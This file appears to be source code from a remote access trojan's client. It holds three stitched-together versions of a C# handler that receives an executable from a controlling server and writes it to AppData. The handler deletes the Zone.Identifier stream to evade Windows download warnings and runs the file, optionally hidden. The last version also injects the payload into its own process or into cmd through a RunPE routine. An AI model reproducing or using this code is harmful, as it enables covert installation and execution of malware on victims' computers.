public static void HandleUploadAndExecute(Packets.ServerPackets.UploadAndExecute command, Client client)
{
string filePath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
command.FileName);
try
{
if (command.CurrentBlock == 0 && command.Block[0] != 'M' && command.Block[1] != 'Z')
{
throw new Exception("No executable file");
}
FileSplit destFile = new FileSplit(filePath);
if (!destFile.AppendBlock(command.Block, command.CurrentBlock))
{
new Packets.ClientPackets.Status(string.Format("Writing failed: {0}", destFile.LastError)).Execute(
client);
return;
}
if ((command.CurrentBlock + 1) == command.MaxBlocks) // execute
{
DeleteFile(filePath + ":Zone.Identifier");
ProcessStartInfo startInfo = new ProcessStartInfo();
if (command.RunHidden)
{
startInfo.WindowStyle = ProcessWindowStyle.Hidden;
startInfo.CreateNoWindow = true;
}
startInfo.UseShellExecute = command.RunHidden;
startInfo.FileName = filePath;
Process.Start(startInfo);
new Packets.ClientPackets.Status("Executed File!").Execute(client);
}
}
catch (Exception ex)
{
DeleteFile(filePath);
new Packets.ClientPackets.Status(string.Format("Execution failed: {0}", ex.Message)).Execute(client);
}
}
public static void HandleUploadAndExecute(Packets.ServerPackets.UploadAndExecute command, Client client)
{
new Thread(new ThreadStart(() =>
{
byte[] fileBytes = command.FileBytes;
string tempFile = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), command.FileName);
try
{
if (fileBytes[0] != 'M' && fileBytes[1] != 'Z')
{
throw new Exception("no pe file");
}
File.WriteAllBytes(tempFile, fileBytes);
DeleteFile(tempFile + ":Zone.Identifier");
ProcessStartInfo startInfo = new ProcessStartInfo();
if (command.RunHidden)
{
startInfo.WindowStyle = ProcessWindowStyle.Hidden;
startInfo.CreateNoWindow = true;
}
startInfo.UseShellExecute = command.RunHidden;
startInfo.FileName = tempFile;
Process.Start(startInfo);
}
catch
{
DeleteFile(tempFile);
new Packets.ClientPackets.Status("Execution failed!").Execute(client);
return;
}
new Packets.ClientPackets.Status("Executed File!").Execute(client);
})).Start();
}
public static void HandleUploadAndExecute(Packets.ServerPackets.UploadAndExecute command, Client client)
{
string filePath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
command.FileName);
try
{
if (command.CurrentBlock == 0 && command.Block[0] != 'M' && command.Block[1] != 'Z')
{
throw new Exception("No executable file");
}
MemorySplit destFile = new MemorySplit(filePath);
if (!destFile.AppendBlock(command.Block, command.CurrentBlock))
{
new Packets.ClientPackets.Status(string.Format("Writing failed: {0}", destFile.LastError)).Execute(
client);
return;
}
if ((command.CurrentBlock + 1) == command.MaxBlocks) // execute
{
if (command.Type == "drop")
{
if (!destFile.DropFile())
{
new Packets.ClientPackets.Status(string.Format("Drop failed: {0}", destFile.LastError)).Execute(
client);
return;
}
DeleteFile(filePath + ":Zone.Identifier");
ProcessStartInfo startInfo = new ProcessStartInfo();
if (command.RunHidden)
{
startInfo.WindowStyle = ProcessWindowStyle.Hidden;
startInfo.CreateNoWindow = true;
}
startInfo.UseShellExecute = command.RunHidden;
startInfo.FileName = filePath;
Process.Start(startInfo);
new Packets.ClientPackets.Status("Executed File!").Execute(client);
}
else if (command.Type == "self")
{
byte[] dat = destFile.ToByteArray();
//File.WriteAllBytes("lol.exe", dat);
if (dat == null)
{
new Packets.ClientPackets.Status("Payload was null!").Execute(client);
return;
}
//Assembly a = Assembly.Load(xClient.Properties.Resources.RunPELib);
//a.EntryPoint.Invoke(null, new object[] { new string[] { Convert.ToBase64String(dat), "self", "" } });
RunPE.Invoke(new string[] { Convert.ToBase64String(dat), "self", "" }, client);
}
else if (command.Type == "cmd")
{
byte[] dat = destFile.ToByteArray();
if (dat == null)
{
new Packets.ClientPackets.Status("Payload was null!").Execute(client);
return;
}
//Assembly a = Assembly.Load(xClient.Properties.Resources.RunPELib);
//a.EntryPoint.Invoke(null, new object[] { new string[] { Convert.ToBase64String(dat), "sys", "cmd" } });
RunPE.Invoke(new string[] { Convert.ToBase64String(dat), "sys", "cmd" }, client);
}
else
{
new Packets.ClientPackets.Status("Unknown Injection Type!").Execute(client);
}
}
}
catch (Exception ex)
{
DeleteFile(filePath);
new Packets.ClientPackets.Status(string.Format("Execution failed: {0}", ex.ToString())).Execute(client);
//MessageBox.Show(ex.ToString());
}
}
